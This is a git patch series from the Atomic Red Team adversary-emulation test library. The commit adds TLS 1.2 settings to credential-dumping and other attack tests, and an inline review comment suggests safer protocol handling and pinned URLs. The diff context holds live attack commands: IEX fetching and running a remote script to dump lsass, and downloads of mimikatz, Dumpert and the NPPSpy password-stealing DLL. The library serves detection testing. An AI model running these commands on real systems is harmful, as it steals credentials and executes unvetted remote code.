zR=BqQowpjmQWu~!5ub3CkLM(($#rFIVb4ryQSgy7pn>}eQfBjn+ zCZV*o9E~&5_2pBlNONA{qc#{3lRG3fy%({hx>oVqquVz=S%%8;4eaE$!xO4>`0qBh z0k36i*va0TD&O>p?rR`+SItH|d>Uy&NSKwg9FR^yWHn}n(B3Uu&U^2tF)u$3Q&J%j z%f7v<+s?Rh0PiWk#>IQdG>$|FHBK%ce3lT93liQ!WdBZ9w-P%E(|?0N@>UfR>x1T< zt)umPlu0uEZMjrEa)+nin8B=(y<5=bP+~1;&nz`MoYbD7^la z)++1W9B34NG!0|v3wsl#h$(RTdnikPELFIHN$`@hcl=n;OanZT6pOy}$0pPk%ufB3 z|M(<517&0dukAwYdpTzJsw-0vR62X*L2=>KbEad&OpdgukpY|-sW;=`hO;$MCC(Ep zW;;KYCaRvq)29h(nKhwcP6WWxZG&W|7FgAP07uVWZ!l%_fZJPcmlbbkVrS*LDf)x4 z7oXLR%R(Q@U5K_yBKK_G=eO^9e1}~L*H0(?K`J)_I!k@ia40 zdtAi@hHz$MQ+OLK*rU2knYW+whIQNGE%%QOqK>fQhE{G9!>}XJ#ODu#)3zh~>8o&W z0qf{7tA@GY-%?EMxA1P+vy_!8e&l!XI=aUgF^RL38RDw3#b!hKq(*YmLV*Jzq$-^{ zdNjA;r5Ke`*d%+W?@G^jXCG*YzQaKmLB?SA`wy&YJ#!9KLT1x0MmMOoYF<_{zyG2gXsvQh$tSh+U>1l&kHl+FbA)qZWigZ z3Af%-|NK78g`EAQQ+0u*G8*KESx}!)tR7C&vAQZ%|Cik>mupSnUVNKEJO|?Tt>J#6OpF&7aCN=e3TxA{g&lc;&P=7&~Ct zpcRNB>Q_g9gEQF-g0?pe2R}Pfat3rBZPJikKisg&((313(+3+D=izn4UTS4a z5MLR%PmF)-^l=~T*ep=Y$Rt_KCmj6A8xSkd!yBCw2OErzNFfx6ExvCFNR=ARJw$o3 zmcI;22U1Ty(rS@)92(J{FIi5YpdLabc_}dNsJ?QgJT)0ws2G_sSll=<%=P%Rq8Cef zV!Tp!tJ+Ua$|?@NYuRoTw$@sO?2-EkVDll-?BH5n4cOx4{tntRP? 
z-pgTBa0vhF?e;%_w&IW5_Ws6!xQ|HNh;0QTO_p3$q2ME-mj+XO|HGZ zj|PySp$t>kUHoDEP}yl(fA8+fM9FBb4Ap1uu^d>GTeyGsUO0>dR^DBAY-+IfKI&u# z!BrGO<63qls*@v0oSwqU8aSzhvpYvb#AB)r^t12a2a@u!)*q&0Se|ZO@Xzfy4-tml z!XY^W%UC2nS1@pO+A36+wn6aR!eMclrCKTS-T2vFPdIRlO$zy;m`-ms5Qq=gvt;aUR%!;KO@f(75;k2X2U6^l8i>EyeRf*Ph{=hEsG6c!R*_K*&0(5|Nk_ z)x2(`EpWzY_Rk}8h!aMfz=K=l79IlIE1F{AZ6C{R4kG)M=@;EyLmYMVK54|LIaT%A z%*;D{rmp$a$0IjQ; zJomtOfUgi%$C_qm)8&d}+JWfB!F!v7WS9`)BeurqQ-ib*-S4vUei&yVT*IkU z!PbmwcT=Bv^uKow_L{5l+y=~zoO=GHv3Tt1Q6r#|nlGF`qx*hVQQ9G_C^Yu{5&v-7LTydE0h{N5k30*&j5AKs$ z71$DRL^y|n`{hgyIe&sr&@K##z&I|sZWzQFe^F=ykSQ_FVC$X z9pOCzXiscUWKZHpnoH=*^lqa~o$jW93y|r}o84wxH@F*PlkQTm`vP(UDhtvN?a|l& z`5Nx>LpeAbmR z2)7TncdZRE=jWkt#Bg32S&jZWF870l25yCIQpUrU*Y@r@!Svt9+Kr5m%$dORkLsLC zH{f`Jg$Kd5V@+SLp3qzN;y#T={0$%~s^NQ@nN|M|;A9r>QH^l%}ngB5W zD@&75HK{hKsOqRxdkb;N9-jVt$o;*Yu-JkA!qI@Q9SWz{3T~^RW_{tO&5n-khJmuB zI-u@xN6!rCXx^TkdsWlTucPLUr0yULjoeD@n~}5SVQuT3_r4QHIfWDYo_*Lt(}BJ% z-aO!>eX487(>!FabCnQ6raHL%{SolWPdqh}a0>nA_!swm3ui-8D_>!E;$h%h(pzt6 zt--AJY|7ID(cSnuV~fOFLvK;1fO((ijHQ5-()(%l!`s2Ily~-X&CZTPqmWim5K$Pl zmdzJ*4_B>@pR#wTm9lsE$oF5Z<=OR*%}nsR*lZ~2H8xWs16#`ZFsQ0b$Z zOYP{l5?_-)8VLy$34D+Hk12{mCCDfYL;{m+^jPlLwI3hZlG}98G*1ude=nT{;90qw zG>oE3?~o*rNbcRo%B!W+eRT(f1h}i%$9u{OFK_VB^-;}4*G*IjKHT-&b7HAKz7`)Q z$zB8w>#^OQTB0m<2&YQtKS#4QHvLI<%wHi{!i=X(UhTd^Bo+$VMNZNLr8-D=k~DWY**cM~kHRTeAhM*d53t9t8ZH+YQ;4wtB{FPDcheF#S^d!;f6ihoKXFm4yRnU; z7GhkxA&2>)Twyw-aFrI3Kg*ySZM`&cY>R_qEdPKYrZ!LEgno=p5PX%4_V(9ker^v7 z>+mde^gd&(({!CW@6fhWc0`JL__N}mGfA9V1P>z#%(XJHu2~Ksl7{sryTyxoW{2~> zwK*7go5WqtpxJjvJ?GTn6QV66=UCBdh(mpTbz+B5LE^oEn7#dsl#6=w{5K^2s-YoK5>XVtX8WcJx<;;!Phv`F(tm zt1jYDeyYi2`ajA*Zc}64oLkkx#Tk5kunwVbd`{E!1%fA`cu!8(^vV_jSA)0EIP-Ys zi{rywJbni8+>mO;zW#>i8ezN2-b7;Gp`&8j^qR)>iM619*KtK<`JzAU{NdG=qcKx~ zQbDl^VJ^?nFhV=V;1@yE6A`A$m-Y%4gQ&@qyIh5ZRsBrBG(!9Wug z>*@6V;mUi!b2GDQ^E7AMwM=?`WbGER(%0jUduoZ;;5kNKsD~%!CC7(-$^8Q52NiyS zNGX7CkLH=49tRD*f}v;E<)Q#dQ~F0umW=2xc%s2%1=B-)#iC_(#;c0;urKh+CVFcE 
zw_fDzLE0K>3t9qIE%_w$yN-O(W1T-NH!`BD)o85QVA80G>Gp{hU8P3ZZT410hLzew+R9 zO>z-$X}q*;fH<*nR3WFAYN4N6_ZDY&_d!c&q2g0RZ(5cG_WNeetBqcR&OnoYx%x0a zV~ugHLYQ!3P9xAihI3^%9zg_}Sc(K*qk@As$*SNO*RoMMIGje7$rKikusud_ebA*I zdgk(K>{jwKAK1nG0ypNBSl>#WDq3}%M9f(D_HchKH2TciXYa`T7S!*{FbETLutE12 za^C6QfAkO%b$nigLYBY|oT9kb`jNRItj4G|p;{Y0v%)uCnyBn7cd+Emd!O5d#Dl$S z_1M)|D)}T{i`5_}ZwpfaTpGF1e!}4_3x`@fBD=hZnX`JL;q2$9h=f+bdX^J* z8X_NxHA*@)BVZjAI` ztLl(?!=*aauti8GfbfB1wt@Q*eat2*Yu7DnL-sTJGh$iUxhWmZkh;=`jW!JDWkJgI zB73!l8M$MDoyvi17M9zF+XNwbXUDs_0y6z3M2RvXk#WXGORNfkg#(aUerdAcDs^n27&Jto%cH;s3k%pUMmwjKal0{6D;b90dB01OKmrP{Hw> z)ZhP?FTsL9|Csmxk05dX>(slr{;)N3Vez!HRhEN*WCs2JZT)}u{>2BYa#9lg_a^_- fcv}DDSO4+-|J5N_m5b`%#smXg+^_;1|C#?kAC)_2 delta 9926 zcmZ8{RZyP6vh9z%Ly%y>2@u>pNN{&|clQs1ySoH}yF+mKao6DP?rt}yPSxJ0?z~J_ zbx+kiboXjm!i%6)J%rjuP_C-8isc$*OnyWJy9!ZwOryaP{E`BS zi04^}91EaT7QwtW7jw{>H>DeQCEc6P>8#x}bH zO7co)J<_xb$g$tL${tR^gk8+ZX$?`b+RDK@7Rs7&3t=l(*P`8$nyF*4Y%3UB%H|eB zh?o2b_uY7*=TQ>=p3(S{hhkg84J?a#p*eiXs0jo=Xly~@xqaZH1UA4{QlPhYi6Wi1 zcv?8NZ?V5{NG<%-CH@SierTe$xo(zJ$}p`u6@S7<=K9x=<|=M?x=+Jv`}Xm+0{+m~rI7nZfzX7s zu~8^mmWJ)F-D~kPkMFCl22_cX1Lj&< zmwpM^-@kTEeU_jfD(0JeLoh*o*;x5b_4oo1Q7w{N5-u5LnR6i2&Bf%qn0h<5j$P9` z*E78$Objv6LZ7+1PDKUekpFrexQ#!jMsiEcNkwBjUjM z*%`tZ>+MQg!O?{!r);zOEM%3eA37mWcw8tQ^QdAs{e&ZUa$d7&(_$$yW5m}5eIoZo zrZAOAEjF5nbCG#dtMHndpBFG%lzVJrYO08E&5a{Cr3Zx(n z1&s}Y1;K+rpf8{VqS;JD?0+H;2!!$P@~~laGcr_gvbQodcKK#xX?Lpa>!7@l+;t&2 zP*)RegS-W%=!He>bIUPVlIW4Mm7Ih%B4>1aw2-Nx7pxI#B9w%k1;qm>mI-zVGZf?d z#^Jqf=iF_M}C?Zz)kF z#t(8`J{sVj@G@ua>FB1t3bcDZ=0mLRq%3sOgOAVd|Y#iTe zkOM*uw#K&^nzzZx;z+0!4Z<#LXO?UfGMO4MUgeTtedr6`)pOE&P#4 zJLe&Zb5Tp+I6#12H}#0U=pu*>(jD{*E(4UnFNhBM>5tj~s_dpRV6B1qgJl7=98d|m z%Y)j|2d((a%YDu0*E>XZ$$W5O2`6Z-FPSenMD zjIF?!({PP>K4fNo$sH=B^#mqDJA$0=Ud+xuX|iS!9F(8XOB3}?zajFc>Hm1jokFJ> zK_8Hp&9rWVI;$@96QUkrPI=9D&v;`4(?*-&1_RcLIiVi*JhhU^Pe@|=5?!3xi%y!Y zV?XM%YO!>rGUY7FpzN7_lJ<_QXTwS5FD4|5dA!2bcc|Vt8t#~@Co8glD<3iL-o|!p z?%pbtQqBRp32K)vPqb$TL+Tpa2YaNebEiqId)_!){%J*i$=C1DgY>F0#+F| 
zmcnp-v@Q|s#Y*887Y-5l6KC)I+F+ft?sA95J^S@^=R%MUv_B zS+?;?R}bAztNkhZCLsYjW$9$qjQvtU9xayw_D>fmgGug0*&FC`Hg=*+6Y7tJo~OyYi{qX44;YLnjekTbT=;=8Br7WwvJF@gb*cy|0E0U;`YL?7 zzdtI(MY+|53C*Y?>B{6v1HPJzE%TK95zl1zt(hD?SM2MR6!F`mcEm-2;>RB0(zGbT z8=W#jq?xfipGCE;uOZz)*S^)&c{WrGyA2i7Ae||kc#O|IYllY?^~9X7j$r$2Mk_0u z`uJ%d`>Tz*nqKK=Y`3gt6X1w;lT2WqI9o5#$4wchNufpZ_6GjXjA)kP66Rv_sG($| z>FHN&%PbVZ@jz>p)RsFar3OH(~pbUepjKDiA z7PzPNm4*pJUNe;ntFlt7AlxF93j_Y9b>ceq;exh(YVQwWj@w3oMF60oz%BqRRLqrg zRA`r)Z(Vvv*e|6WrQerV7{y=uSZV*I-hif@uB}Xkx`Q2!nh-ldrnLocq1Ombow3UkN*F;Z^P%vZVZy(k zI0)MuF6Qq^>P`JAoLF2)c_QBi_F#&O#{9a3{~ksAT71&8?aJdwqwkmz`00k_yzwLM zJeLEzFz~P?#uqvodS3L?*Wl&8DVgQrCBoDv=O0^AM@t)KBfy|H*gV3L`d3@Vl+F?F zQgec^(s(?-C2HjL8OfMQbI-XYi_$liMS**5uq1mwN|R&rzN_{8m}MgloI!PR=6!~j z%Ca?GGG}3jS)`=*cznWrM!o#9HRWmBj9z_zVaI?`uU@9Rf-dE0V=qnfg4rSEuaCV$ z6SO9thN=!U1>oX->n%0OjLP`E3w1-9id+Tq)Nt7+K{~AIyqq*B9huvAteDjdPvo>G z*euL6q)Wcc!g=a|g9R14t+fgr_GwIZOix{=%8paY_)->2`E!K<%bkR6Zgw4h;>)Ry zuHk)_S^jSw?7$IeLVfTK;GSi) zdA(>ZUX{9}R?(}mp7l+(E>zQt!d|tI#G@fW`Dm^^~gWTZ4|8Mdvp!ClkXOi zm)jCF1FPm$Y^FDhuyjGkd9CJUlXK625s?g50D+HgkRCI7-E6`Y`8ID*mytNp8gb|z zKC6VJJh*s?vIEC2c+RW{RF-fV@9NY@K3O$VhV3-lAb0idX<*u+c6^&?5u$dKZ8MvY9sGsv-l@old>+Lrf74nE zB$75~rJq9{v@vh<_IMM$mTox`oyn``$JG8_4s%wigH7U5)MuRdg6xx5-^($#I{Jg> zq5X1jbtRR~wsFCfT_ zd^~2#g3p7#gSO=5xi}mL5q~z7Yo%S!x2*?X0N0{cu6$$4($HLJj-WaZf5MVTJ8>ne zVA^B(RXcxwzwcUfFv)|h?3^zJCed)wBz)~InhDv?B(pC}(DY?S`pR;Xe0Z#JO0kaW zwNHMded_i2MgQvcnd8G+C8cN#fZ1R@dhvZ&_q-lj@s0&p8)S+$H2>D`$OH;Lf)5x4 z?kcG%2!Gmx;i)!fWR@mqV+nJdk=VmICdVL8>74JO4_ek#*09d{v!s8SIOg?I6|P=OvEcoJPRs`UfKjgr@M2!QiBs&= zZR{G{ASRY}dW?De9_%@t^M8Dl|B%`E?)@N6KJeQRj*h-hGlXx1%VAdpjt;bkAK80< z2nVh;Jk?2k{fyJ|7oYbaHkDh$?~4pu-ISMf7*A(7{d;8~jwakneys+ZrRa8`@36K! zhAdoEUoJ+u>xF0f^?EWJz;TiSc0kkOJlR-|ZmlTw%O`K2T)e?ljgz5ljfz*XV5EGj zBH3m3W9dcvLRK27FP?0}*{^!EM9Py(1H4sW~!`92$LET*4Ikl4- z-Ri<(w(VAbO}PK()zGCsbK3F;@iZl>Ju0Eb_p=dBKfCKy&pB&bK#(4({mFHTHm#07 zBkF!2YPJMyRfvT%h&N9at1um z1KuL~WL)fP28A2`h#AYikz>7;@G76P@}nx+H$P3_oBD^kgrZM%(Xbp9xt4Zy88y

eBD)fFrdy*IT7AWZT|ccB!JtKs7MH0FUBzEeeR;nWE$Xz! z+q9H>v>HMiwSzb3K2lV+$ng0Dc$jEnD#lB`x!(a?7JjD&ge<$@HGsK3gYyiys?OcmA=7zd%NglJZ8%M`s7$^TY2VX3m@oR z8_o+cC1OzB;+K7i^#SohM!0fBiZZc&CG7;?$PcI$PLU5K@_CZ4|9U! zSBCNVZwzPG>Mwy_x>|xOt68WXGoI(6x3{x4`eb~-rcL;FYszfvAMJN1Giw2l-9kQ7 zO5Lq1`SGHB;n`jzOG_kj29fJTR+dYI-NgBwZ5^yCSUNL*)t+*9JVIwxFDj<9^46z0 zvu$^#*G0J;@zfKNB4CU^tPGI`>A}pdM~m*`Fd0{)uy9)GzLH*s>d!9?$s{ZB0^`-@ zF?1V1cr4xMdiuqC|LgUY5?30>6V5_9*we=2YTQqCxSXfHuCc}_e#5O?U(;)!My&+3 zV!zTn#hpWyV0@?TFxPRZ$j9Bl`h7AbvGDEw8tLBq!_@Qr5mD=upE)oYmoDXYK;V9& z=K0j3WqjWZ$tDkn;ULp*rgQu5KKZC$0~-<$7{pgHlwWOm$2qk|XFcd_QSK?{%4awJ zzVwB`K7>Rt9L$p}4uMc1HJDoz^TiWU=$4r)Hx7RVz2uY+? znb|+y+I%_396M=E&lCRZYWWv);lh2ocI{ZMhRkL~Pxd3LV6sZlsFf+xIZJN(Adiyf zw7Gamas~psskHrsHdu~mLVDKl3=$k!g&QTWce#SMX874u_Ko}V{^O4p@0J~a1nBPs z|NN+}#2!C!CK6U|kzD)xmnxhsebAF)caCD_Rzr|}Mh#Ju-xEK+YY1PMV16~TA}Pf? zK4r$qzFSGl(xGfI!2ye5=Dv7I_+yaSl+j;C%w@jD@+Tksj1S{F#|?nYWI%;_9Z9fD zO0hu8twh^s25bH`Y%>*kD(gG&!D7T?I_xMR&Ll9dA3W#BwWU6#etMEE_WZuJ!$5wm{E(lxVjq*Y^-G#=*(ILbdeTe|D5`Rci(c*44 z4LWbF;-z%+{J?i;4!Q zb4n{eO|mcg!+}`JP`3lblum0fAJqs$WkxM3kP4*zG!KHGjcZtwpm3bUQ9D3)Yrd42 zYyC`T<=bf2{MnXFB)6lnmh2FP!`iN^Xx=XiL+@naXQN*#f{!f< zo7&^aTh6mk$LK`>?J257P%Ejxr=^Q^Z26+BXNeKKQ&!B0@j!22r!Ddn>&=yYUHzoe z74C#z%Qd&ZShYH#)zhK)VNvvw&iC;G@5DcN*15elb{x;` zs&YR^cS_5hynG)6waZp1=MS&vcc4C$4@$)ZNZz3%PJb3g6YD1@Zk84D>7l)Ep5PQd z0}%fiFk=6o31bf~dZ!#52sDtGfw~2tBufF_rS0-t%<vCI8nX^}DT(U^9=KI*ZW zA%zdr@-EbeD$yCdJ9*RUYMLpAuweU{T-3D4bCPTqXNaQkJfGL5exW-0X?+UN*R5|M zDvJ$X$W;MqLP(HXH^q>ug=qzJz@gb@#pWjqx!C&J;05V3J%#35YXwnBr#~Uzf*Y;e zTb6N5dJki;){z5+I}&Io72{CKPnDEqG{`vjw4%;g1VH|fN)(dY!~MweQ}A_vB5Alc z`&KAt;W6z)FsTgwsL-NFsXhYL0s-$uh@IY}9F z_`TmRk8VP{_<`HQC$N59OXF8*J2*;Z<@5Pi{g1ad+;#n~_sioe&Z9Z%tKPn@*Qe3c zu8%98yPEA)9L7%H>+7RL+zsEm1Nm5@}#urqPh5-QT%N2xRb|2IC zz62qRL${Li(IH4ZZPMdj*P6556+(>xn0CG{>!ntbs}_ow^lI^1m{sE_H#~Qq&9aQq z%S(qGnYF~5mhiUlsd(%2Z&DSYhXdAJ^=+l4=o-^~lnBi5BCehp<*r(hD5CN4T*Ac|z|9gu4)tcTiu5b^ACH zq@50DS|agSG6ps9Al&4i9mEs 
zN|$RdOT{ZY1{ILqWQW`%*^Qi~U4S`cN@(knJc)+aG*9*Vbnc_;K<8&)KWL!8&VSYk zjqhWHPkP^cKaQ?w{gcly1RfC?ckO2w&by9icDa_#c~a(LCI=c6wzyiyznxcf|73U_ z^{e{`u{(q_EKIES)k_jjCXMNVXh1!}0|~vgmqpHMw*!z+;r!QA)md-;@#Ce;Y*tU8 z+H}G?{YGox?*2~LD!tt&V1(-8`Y=bny>^fFOVar$On=*VcVFoC=_oj+k`={P>J}@A z39`ow_B8s{ByxrwM=C*TmgU$fWGxZXweGA4nL8B^R;pa%f>2jFoL^IwFLE~?vC*?~ z<}DSi8KnRcOu~}~txmK^s#MXT7XQV1<=lzip^Cd^DlE;?ES{l^*=I#pJVkxf@7Q|g zL3&H+8q+Qs(+bC_d0OI*dx%W7I5-}A_nTrJd!fS1!XajaNe9L_#SQ80QB{Z&>Ed3A ztflD?3Py~qq_Hl_ORbKcR<4$19byFxE34hztsr#b~XzgSO(UD|2qPy@8d9d`5 zTZRB@c#1i4BmrB>RSxfE{ToCT6ibA?9VF4Q9Z)<6oEQZf8jN&sG2#A^flkNc%mJA- zIPrT=?%M_<77OhWGu%lr&bCpErYZ58(51 z0Jw^k4i&!Jr;^h=&wL(A;xLF@P1KBr-)QHiX87=qP4_Vy~2e4{%^#H{(L^-wnLB5G&(b8IcQETbx#p}ilPQPT02mKARk9H32IDcS9!HeRhI9$w^dOU; zl$4cBMVNX_(svGTbV*mPAl?5l9sA<1zya1i$bk9Mw8|oRmTZ^yld+K_foCxTr8e5I zq3%5nn*tR~8=pkSM@nzT+NrXW=Ohxx4U13;|&$a+&u=ssMr6X0XGD zOWwLNORUf?8Hzce#J*=+^XQ`N@>jca*og8A)L98gK1ebrMav?PPy#Odgg-)xLv&TC zXCdUJCPV7meIW0BjNX|@*6x(|1x3!FAyDfOhU933;|;kvq#QTNoR7Ge8~D~>PulTQ z^0UG7A3)R|dF_WI3y;uqkZ0@PqMyS84?Bk=$~{(aq9_|SZ^tfBUDjuWCBKSsia%GD zToxjeQbUck5NO>+9L#5XAm4ycNZfZ>)oSI)2XLO zqaOV?Zm>%&S7k=qxx8OEgzy000T&zPe8G{8HIT#z&NTN5+dE6CThnH_8upCau4_;haN?}oX5-VRRmK_&z2SD27PE}-s7px55;0ebN) zGF$YDP?Y}Gv#Oy6hQ0)3NlQ%Rmy7%?O8#9;>>5x!3rWIuc|TYYbr&THM{Ax9!B|Sj zaSeWc{&rzf_A(grB+Y6u7iaDkIz@n95YQrQSXv_P#-O0lo?UOLjUXHKjvEW{f)1vx zra{(4q}-yGgt+l0-=|sgSRR;MRuECG#~(10ctwzr#|+<^aPvE+D7xUN z)0fT${jIsljObvu9eJ|Q2QL_8wC>cpm1RF9}O}E>tE<8Ab_X@U1=~AcE|A!} zuL>FH*a6#GDpvZrsb@TTxkH{s(B+LkA+x*lR6Tu@okd!jE=?LCPUsvINojwy&`$Mu zi!i&rf)ZLNxKz;HmjS7L@a%c5;cMU-#3X#WF+vW)KE7Q*Eq=I#5TXFtcyT4K|0bSQ zTy8tqGGUvf8jf!57fLpZ=uyZJv# zXO&#JEVx-tNMqL80v7H=R|QkV)n*g+z1i+KVJownEfsKbxSVaF0b$?Kmj?yts+ZQ@ z+@eSDC2^TG2TVFCX=PK{GP|0MfxG6O=bwZjADL-u3JJ1d=0fQ^k%@YYcnF4)2(x@1YbZslOV5s=3Y}k4yZ7aP`|A)gh*&Imn|~RtD^|3h(BG3ZJM52 z@;Z**_4arcm0Tm_(Z7wG?pFxk`;83){n;A#KG|b&P1g?xCIO-Gidl#<#(!H}-$yBv z5X;2LALa*ig{X9rn$mCEJk~!3+%+?OtN7a-7p67aaeQhR;KW6E=JJ-3lf$)jJ*W^z_!#8H!heqDb4x8$s5 
zE9>Y`cDR!P4`|8_*kj_cnucgc{KjL;`M|<7Bp1NLR{i&*EjnzL)GZY+R#+|U%3M^V zyo4qo*#8>E0Ln|SNeeONeweU+5M%rSg?ljY#Q@T9i_r042 zYbC&*$9aNNFJ1nb+MB4&q&GfT`3@Xx?jzCWVGXah;3=T8^4Fx~2}bTj0A-Hfp5^6> z$y!ED==1zd7Zcz6&Mo-v+Dp;z+mo(2E9D0Cd)+%yA{$FwA_OZz;yMdlA{i?+;eU8u z|5{44fAIX@gMpB^$?}Ep|7W!P*T4`tk(!O1@IMVH=|8sEf3^Rl4AR73s5pt;tmuUQ ze--dwJA9hNQ&tkf|D@D^oHM-tYX3=xUlRk62@(NT^#6^^M0qwGi0edCHj4i`SYiSj LJ1jNJ|GfKuM_(Yx From 42799b033dcab848999d935170bf0b711e7ff938 Mon Sep 17 00:00:00 2001 
From: SecurityShrimp Date: Wed, 16 Jun 2021 13:41:04 -0500 Subject: [PATCH 48/84] added TLS/SSL v1.2 enabling commands to any atomic test utilizing IWR (#1519) * Update T1204.002.md Added lines to each test using IWR for invoke-webrequest to set the acceptable TLS versions for the commands to complete successfully by prepending the tests with ```[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12``` * Update T1555.yaml added line to set ssl/tls version * Update T1134.001.yaml updated IWR lines to allow ssl/tls version 1.2 * Update T1069.002.yaml added lines to every IWR instance to set ssl/tls version to 1.2 * Update T1558.003.yaml added line to allow TLS/SSL 1.2 * Update T1033.yaml added command to enable SSL/TLS v1.2 * Update T1055.012.yaml added command to enable TLS/SSL v1.2 * Update T1115.yaml Added command to enable SSL/TLS v1.2 * Update T1070.001.yaml added command enabling SSL/TLS v 1.2 * Update T1564.yaml added commands to enable SSL/TLS v 1.2 * Update T1566.001.yaml added command to enable SSL/TLS V1.2 * Update T1135.yaml added command to enable SSL/TLS v1.2 * Update T1055.yaml added commands to enable TLS/SSL v 1.2 * Update T1110.003.yaml added command to enable TLS/SSL v1.2 * Update T1003.yaml Added command to enable TLS/SSL v1.2 * Update T1053.005.yaml added command to enable TLS/SSL v1.2 * Update T1003.001.yaml added commands to enable TLS/SSL v1.2 for any command using invoke-webrequest * Update T1069.002.yaml syntax correction * Update T1134.001.yaml syntax correction Co-authored-by: Carrie Roberts --- atomics/T1003.001/T1003.001.yaml | 6 ++++++ atomics/T1003/T1003.yaml | 1 + atomics/T1033/T1033.yaml | 1 + atomics/T1053.005/T1053.005.yaml | 1 + atomics/T1055.012/T1055.012.yaml | 1 + atomics/T1055/T1055.yaml | 3 +++ atomics/T1069.002/T1069.002.yaml | 7 ++++++- atomics/T1070.001/T1070.001.yaml | 3 ++- atomics/T1110.003/T1110.003.yaml | 1 + atomics/T1115/T1115.yaml | 1 + atomics/T1134.001/T1134.001.yaml | 8 ++++++-- 
atomics/T1135/T1135.yaml | 1 + atomics/T1555/T1555.yaml | 1 + atomics/T1558.003/T1558.003.yaml | 1 + atomics/T1564/T1564.yaml | 3 ++- atomics/T1566.001/T1566.001.yaml | 3 ++- 16 files changed, 36 insertions(+), 6 deletions(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index eb902b08..95a7a2f6 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -38,6 +38,7 @@ atomic_tests: if (Test-Path #{wce_exe}) {exit 0} else {exit 1} get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){ Expand-Archive $zippath $parentpath\wce -Force @@ -78,6 +79,7 @@ atomic_tests: prereq_command: | if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null @@ -129,6 +131,7 @@ atomic_tests: prereq_command: | if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe} executor: 
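Review bot: The added `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` replaces the process-wide protocol set rather than extending it, so for the rest of the PowerShell session every outbound HTTPS call (the later `Invoke-WebRequest` calls and whatever the harness runs afterwards) is limited to TLS 1.2 alone, and TLS 1.3 is switched off on runtimes that offer it. A bitwise OR keeps the existing protocols and only adds 1.2: `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12`. The same point applies to every other hunk in this commit that inserts the line (T1003, T1033, T1053.005, T1055.012, T1055, T1069.002, T1070.001, T1110.003, T1115, T1134.001, T1135, T1555, T1558.003, T1564, T1566.001). Separately, this hunk and the `Invoke-MalDoc.ps1`, `Out-Minidump.ps1` and `Invoke-Kerberoast.ps1` fetches pull from mutable `master` branches straight into `IEX`, so TLS 1.2 only protects the transport; pinning those URLs to a commit SHA as the PowerView URLs already are, or routing them through the `Invoke-WebRequestVerifyHash` helper that this very hunk downloads unpinned, would also cover content integrity.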
@@ -183,6 +186,7 @@ atomic_tests: prereq_command: | if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' $request = [System.Net.WebRequest]::Create($url) $response = $request.GetResponse() @@ -256,6 +260,7 @@ atomic_tests: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: | Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore @@ -382,6 +387,7 @@ atomic_tests: prereq_command: | if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} executor: command: | diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index 911859c6..d622c125 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -61,6 +61,7 @@ atomic_tests: - description: NPPSpy.dll must be available in local temp directory prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} get_prereq_command: |- + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll" executor: command: |- diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index 98369491..2628605d 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml 
